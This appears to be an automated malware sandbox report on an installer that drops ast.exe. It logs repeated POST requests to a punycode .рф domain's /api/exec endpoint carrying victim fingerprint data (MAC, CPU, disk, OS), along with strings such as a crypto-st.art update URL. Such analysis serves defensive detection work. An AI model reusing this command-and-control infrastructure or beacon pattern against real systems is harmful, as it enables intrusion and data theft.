                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7A09F0 recv,send,WSAGetLastError,10_2_6B7A09F0
                          Source: global trafficDNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
                          Source: unknownHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D65000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D67000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: ast.exe, 0000000C.00000002.2942134917.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446944142.0000000003269000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: ast.exe, 0000000A.00000003.3020160381.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://restools.hanzify.org/
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ZZY
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/r
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt0
                          Source: ast.exe, 0000000A.00000003.3029895127.0000000005D63000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943481219.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000DF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types.
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types;QpM
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typese
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesh
                          Source: ast.exe, 0000000B.00000002.2862003498.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesnu
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeste
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesui
                          Source: ast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesvider
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesw
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesw_sas3Y
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: http://www.indyproject.org/
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.innosetup.com/
                          Source: aeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.000000000237E000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000003.00000003.2454108378.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ish
                          Source: aeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2075277683.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.0000000002385000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2079075667.0000000003250000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ishAbout
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: http://www.openssl.org/)
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.remobjects.com/ps
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: ast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/V
                          Source: ast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
                          Source: ast.exe, ast.exe, 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                          Source: ast.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                          Source: ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                          Source: ast.exe, 0000000A.00000002.3361561204.0000000005CF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn-
                          Source: ast.exe, 0000000A.00000003.3338883178.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80ak
                          Source: ast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akico
                          Source: ast.exe, 0000000A.00000003.3224678358.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3124114421.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aa
                          Source: ast.exe, 0000000A.00000003.3224678358.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p$
                          Source: is-TBGHD.tmp.4.drString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai
                          Source: ast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3124114421.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai00
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai1
                          Source: ast.exe, 0000000A.00000002.3348750365.0000000003374000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai443...
                          Source: ast.exe, 0000000A.00000003.3264857508.0000000005D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44
                          Source: ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443
                          Source: ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443$
                          Source: ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443-0
                          Source: ast.exe, 0000000A.00000003.3265913117.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443.
